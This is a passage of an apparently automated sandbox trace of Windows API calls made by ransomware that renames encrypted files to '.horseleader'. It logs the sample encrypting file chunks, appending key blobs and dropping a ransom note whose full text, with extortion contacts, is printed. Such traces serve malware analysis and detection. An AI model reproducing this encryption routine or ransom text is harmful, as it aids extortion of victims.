returned 1 [0191.492] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc301560, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2cb13b, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OWOW32LR.cab", cAlternateFileName="")) returned 1 [0191.492] lstrcmpiW (lpString1="OWOW32LR.cab", 
lpString2="Windows") returned -1 [0191.492] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 79 [0191.493] StrStrIW (lpFirst="OWOW32LR.cab", lpSrch=".horseleader") returned 0x0 [0191.493] lstrcmpW (lpString1="OWOW32LR.cab", lpString2="#Decrypt#.txt") returned 1 [0191.493] lstrcmpW (lpString1="OWOW32LR.cab", lpString2="_uninstalling_.png") returned 1 [0191.493] lstrlenW (lpString=".testttjffg") returned 11 [0191.493] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpSrch=".testttjffg") returned 0x0 [0191.493] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0191.493] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0191.493] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0191.494] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 79 [0191.494] StrStrW (lpFirst="OWOW32LR.cab", lpSrch=".txt") returned 0x0 [0191.494] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=2928955) returned 1 [0191.494] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.494] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0191.498] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0191.499] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0191.499] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x16309d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.499] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0191.502] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0191.502] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0191.503] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x2c613b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.503] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0191.506] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0191.506] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0191.506] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.506] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0191.507] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0191.507] CloseHandle (hObject=0x21c) returned 1 [0194.287] GetProcessHeap () returned 0x780000 [0194.287] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0194.287] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.horseleader") returned 91 [0194.287] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.horseleader")) returned 1 [0194.293] GetProcessHeap () returned 0x780000 [0194.293] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0194.293] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, 
ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x93a, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0194.293] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0194.293] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0194.293] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0194.293] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0194.294] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0194.294] lstrlenW (lpString=".testttjffg") returned 11 [0194.294] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0194.294] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0194.294] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0194.294] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0194.294] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0194.295] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0194.295] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=2362) returned 1 
[0194.295] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x93a, lpOverlapped=0x0) returned 1 [0194.297] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffff6c6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0194.297] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x93a, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x93a, lpOverlapped=0x0) returned 1 [0194.298] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.298] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0194.298] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0194.298] CloseHandle (hObject=0x21c) returned 1 [0194.314] GetProcessHeap () returned 0x780000 [0194.314] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0194.315] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0194.315] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: 
"c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0194.316] GetProcessHeap () returned 0x780000 [0194.316] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0194.316] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x93a, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0194.316] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0194.316] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0194.316] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0194.316] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0194.316] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0194.318] lstrlenA (lpString="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") returned 1368 [0194.318] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0194.318] CloseHandle (hObject=0x1cc) returned 1 [0194.319] GetProcessHeap () returned 0x780000 [0194.319] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0194.319] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{90140000-0044-0409-1000-0000000FF1CE}-C", cAlternateFileName="{91454~1")) returned 1 [0194.319] lstrcmpiW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0194.319] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C") returned 66 [0194.319] lstrcmpW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0194.319] lstrcmpW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0194.319] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", 
lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0194.319] GetProcessHeap () returned 0x780000 [0194.319] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0194.319] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*") returned 68 [0194.320] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0194.323] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0194.323] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\.") returned 68 [0194.324] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0194.324] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0194.324] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0194.324] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0194.324] lstrlenW (lpString=".testttjffg") returned 11 [0194.324] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0194.324] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0194.324] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, 
pdwDataLen=0x32af044*=0x80) returned 1 [0194.325] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0194.325] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0194.325] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0194.325] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\..") returned 69 [0194.325] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0194.325] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0194.326] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0194.326] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0194.326] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0194.326] lstrlenW (lpString=".testttjffg") returned 11 [0194.326] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0194.326] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0194.326] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0194.326] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0194.327] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf79111d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1200204, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="InfLR.cab", cAlternateFileName="")) returned 1 [0194.327] lstrcmpiW (lpString1="InfLR.cab", lpString2="Windows") returned -1 [0194.327] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 76 [0194.327] StrStrIW (lpFirst="InfLR.cab", lpSrch=".horseleader") returned 0x0 [0194.327] lstrcmpW (lpString1="InfLR.cab", lpString2="#Decrypt#.txt") returned 1 [0194.327] lstrcmpW (lpString1="InfLR.cab", lpString2="_uninstalling_.png") returned 1 [0194.327] lstrlenW (lpString=".testttjffg") returned 11 [0194.327] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".testttjffg") returned 0x0 [0194.328] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0194.328] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0194.328] CreateFileW 
(lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0194.328] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 76 [0194.328] StrStrW (lpFirst="InfLR.cab", lpSrch=".txt") returned 0x0 [0194.328] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=18874884) returned 1 [0194.329] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.329] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0194.732] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0194.732] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0194.732] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x8fd902, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.732] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0194.798] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 
[0194.799] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0194.800] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x11fb204, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.800] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0194.804] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0194.804] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0194.806] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.806] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0194.806] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0194.808] CloseHandle (hObject=0x21c) returned 1 [0195.722] GetProcessHeap () returned 0x780000 [0195.722] RtlAllocateHeap 